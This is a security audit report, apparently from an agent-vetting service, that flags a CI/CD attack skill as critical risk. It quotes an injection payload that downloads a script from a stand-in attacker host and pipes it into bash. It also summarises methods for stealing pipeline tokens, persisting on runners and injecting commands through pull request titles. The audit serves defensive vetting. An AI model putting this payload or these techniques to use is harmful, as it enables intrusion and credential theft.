cicd-technique

Fail

Audited by Gen Agent Trust Hub on Sep 5, 2026

Risk Level: CRITICALREMOTE_CODE_EXECUTIONDATA_EXFILTRATIONCOMMAND_EXECUTIONPERSISTENCECREDENTIALS_UNSAFEINDIRECT_PROMPT_INJECTION
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill provides a functional command injection payload "; curl http://evil.com/shell.sh | bash; " designed to download and execute arbitrary scripts from a remote server when processed by an unsanitized pipeline script.
  • [DATA_EXFILTRATION]: Instructions are provided to dump sensitive pipeline environment variables including AWS_ACCESS_KEY_ID, GITHUB_TOKEN, and NPM_TOKEN. It explicitly suggests encoding these secrets (base64/hex) to bypass basic security filters and sending them to an out-of-band (OAST) collector.
  • [COMMAND_EXECUTION]: The execution workflow details how to trigger unauthorized commands within build runners by abusing GitHub Actions' pull_request_target event and self-hosted runner configurations.
  • [PERSISTENCE]: The skill describes methods for maintaining unauthorized access within CI/CD runner environments using techniques such as cron jobs, systemd services, and shell profile modification (.bashrc).
  • [INDIRECT_PROMPT_INJECTION]: The skill identifies and provides instructions for exploiting attack surfaces where untrusted external data (Pull Request titles, commit messages) is interpolated into privileged command blocks without proper boundary markers or sanitization.
  • [CREDENTIALS_UNSAFE]: The skill encourages the targeting and extraction of highly sensitive cloud and registry credentials, providing a specific list of high-value environment variables to target.
Recommendations
  • HIGH: Downloads and executes remote code from: http://evil.com/shell.sh - DO NOT USE without thorough review
  • AI detected serious security threats
Audit Metadata
Risk Level
CRITICAL
Analyzed
Sep 5, 2026, 10:39 PM
Security Audit — agent-trust-hub — cicd-technique